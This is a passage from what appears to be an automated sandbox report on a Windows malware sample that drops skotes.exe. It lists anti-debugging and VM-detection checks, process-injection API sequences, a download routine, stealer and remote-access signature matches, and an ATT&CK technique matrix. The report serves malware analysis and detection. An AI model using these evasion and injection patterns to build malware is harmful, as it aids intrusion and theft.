                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 7801
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 2015
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000023001\532d9160c6.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\1000026002\0f2a0c16ee.exeJump to dropped file
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeAPI coverage: 2.9 %
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI coverage: 2.0 %
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI coverage: 7.6 %
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1908Thread sleep count: 7801 > 30
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1908Thread sleep time: -234030000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6712Thread sleep time: -180000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1908Thread sleep count: 2015 > 30
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1908Thread sleep time: -60450000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0043DC0D FindFirstFileExW,0_2_0043DC0D
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021BDE74 FindFirstFileExW,0_2_021BDE74
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021ADE74 FindFirstFileExW,21_2_021ADE74
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0043DC0D FindFirstFileExW,28_2_0043DC0D
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0065DE74 FindFirstFileExW,28_2_0065DE74
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00407D30 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_00407D30
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                  Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
                  Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\
                  Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_skotes.exe_b230dc6fc163fdde8365dc55937a5169439a2_360c380b_6dcdc8c6-df7e-46a7-9ca7-325d7431e179\
                  Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\
                  Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yjzllYsjlU.exe_4363f676aae74bac2ea5a449ac7ab892edc3967c_8cd1c366_09477d72-c3db-4fb9-94d5-24870ab915c0\
                  Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
                  Source: Amcache.hve.4.drBinary or memory string: VMware
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: skotes.exe, 0000001C.00000002.4669012464.000000000075E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW#PWB
                  Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                  Source: skotes.exe, 0000001C.00000002.4669012464.0000000000709000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001C.00000002.4669012464.000000000075E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00436AAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00436AAE
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0042BF99 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042BF99
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0043A302 mov eax, dword ptr fs:[00000030h]0_2_0043A302
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0043652B mov eax, dword ptr fs:[00000030h]0_2_0043652B
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0052CC33 push dword ptr fs:[00000030h]0_2_0052CC33
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021B6792 mov eax, dword ptr fs:[00000030h]0_2_021B6792
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021BA569 mov eax, dword ptr fs:[00000030h]0_2_021BA569
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0218092B mov eax, dword ptr fs:[00000030h]0_2_0218092B
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_02180D90 mov eax, dword ptr fs:[00000030h]0_2_02180D90
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_006EDA7B push dword ptr fs:[00000030h]21_2_006EDA7B
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021A6792 mov eax, dword ptr fs:[00000030h]21_2_021A6792
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021AA569 mov eax, dword ptr fs:[00000030h]21_2_021AA569
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_0217092B mov eax, dword ptr fs:[00000030h]21_2_0217092B
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_02170D90 mov eax, dword ptr fs:[00000030h]21_2_02170D90
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0043A302 mov eax, dword ptr fs:[00000030h]28_2_0043A302
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0043652B mov eax, dword ptr fs:[00000030h]28_2_0043652B
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0065A569 mov eax, dword ptr fs:[00000030h]28_2_0065A569
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00656792 mov eax, dword ptr fs:[00000030h]28_2_00656792
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0062092B mov eax, dword ptr fs:[00000030h]28_2_0062092B
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00620D90 mov eax, dword ptr fs:[00000030h]28_2_00620D90
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_006D07D3 push dword ptr fs:[00000030h]28_2_006D07D3
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0043EE63 GetProcessHeap,28_2_0043EE63
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0041D1E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041D1E7
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00436AAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00436AAE
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0041DBA5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041DBA5
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0041DD0A SetUnhandledExceptionFilter,0_2_0041DD0A
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0219D44E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0219D44E
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0219DE0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0219DE0C
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021B6D15 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_021B6D15
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_0218D44E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_0218D44E
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_0218DE0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0218DE0C
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021A6D15 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_021A6D15
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00436AAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00436AAE
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0041D1E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0041D1E7
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0041DBA5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0041DBA5
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0041DD0A SetUnhandledExceptionFilter,28_2_0041DD0A
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00656D15 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00656D15
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0063D44E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0063D44E
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0063DE0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0063DE0C

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_004070A0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,0_2_004070A0
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0041DD91 cpuid 0_2_0041DD91
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000023001\532d9160c6.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000023001\532d9160c6.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\1000026002\0f2a0c16ee.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\1000026002\0f2a0c16ee.exe VolumeInformation
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0040AA09 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,0_2_0040AA09
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0040B1A0 GetUserNameA,0_2_0040B1A0
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00442517 _free,_free,_free,GetTimeZoneInformation,_free,0_2_00442517
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00407D30 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_00407D30
                  Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 28.2.skotes.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.yjzllYsjlU.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.skotes.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.3.skotes.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.skotes.exe.2170e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.yjzllYsjlU.exe.2180e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.skotes.exe.620e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.3.skotes.exe.21e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.yjzllYsjlU.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 21.2.skotes.exe.2170e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.yjzllYsjlU.exe.21f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.2.skotes.exe.620e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.3.skotes.exe.2160000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.yjzllYsjlU.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.yjzllYsjlU.exe.21f0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 28.3.skotes.exe.2160000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.2334219685.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.2213576704.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000003.2309432700.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000003.2486405419.0000000002160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                  Source: Yara matchFile source: dump.pcap, type: PCAP

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0042EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_0042EC48
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0042DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_0042DF51
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021AE1B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_021AE1B8
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021AEEAF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_021AEEAF
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_0219E1B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,21_2_0219E1B8
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_0219EEAF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,21_2_0219EEAF
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00402440 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,28_2_00402440
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0042EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,28_2_0042EC48
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0042DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,28_2_0042DF51
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0064E1B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,28_2_0064E1B8
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0064EEAF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,28_2_0064EEAF
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  111
                  Process Injection
                  11
                  Masquerading
                  OS Credential Dumping2
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API
                  1
                  Registry Run Keys / Startup Folder
                  1
                  Scheduled Task/Job
                  31
                  Virtualization/Sandbox Evasion
                  LSASS Memory141
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable Media12
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading
                  1
                  Registry Run Keys / Startup Folder
                  111
                  Process Injection
                  Security Account Manager31
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  NTDS1
                  Process Discovery
                  Distributed Component Object ModelInput Capture112
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information
                  LSA Secrets1
                  Application Window Discovery
